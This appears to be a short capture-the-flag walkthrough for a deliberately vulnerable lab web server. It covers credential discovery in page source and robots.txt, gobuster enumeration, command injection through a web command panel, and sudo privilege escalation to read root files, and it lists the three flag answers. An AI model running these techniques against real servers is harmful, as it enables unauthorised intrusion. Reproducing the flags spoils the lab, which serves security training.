IP=10.10.105.20


In the page source code, there is a username like :

R1ckRul3s

and also there is a word in the robots.txt file like:

Wubbalubbadubdub

gobuster dir -u http://10.10.105.20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.105.20
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2023/04/15 19:37:09 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 291]
/login.php            (Status: 200) [Size: 882]
/assets               (Status: 301) [Size: 313] [--> http://10.10.105.20/assets/]
/portal.php           (Status: 302) [Size: 0] [--> /login.php]



there is login page at the  http://10.10.105.20/login.php

If you enter the via login page by using the username and password we found before, you will see there is a command panel.

ls -->Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt


less Sup3rS3cretPickl3Ingred.txt -->

first flag:mr. meeseek hair

In the http://10.10.105.20/portal.php directory source code there's a text like:

Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0==

but i could not solve the hash.

if you use the less /home/rick/"second ingredients";ls command in command panel you will find the second flag:

1 jerry tear

For the last flag if you check teh suıd command perms you will see (sudo -l)

User www-data may run the following commands on ip-10-10-105-20.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

sudo less /root/3rd.txt

The last flag is:

fleeb juice
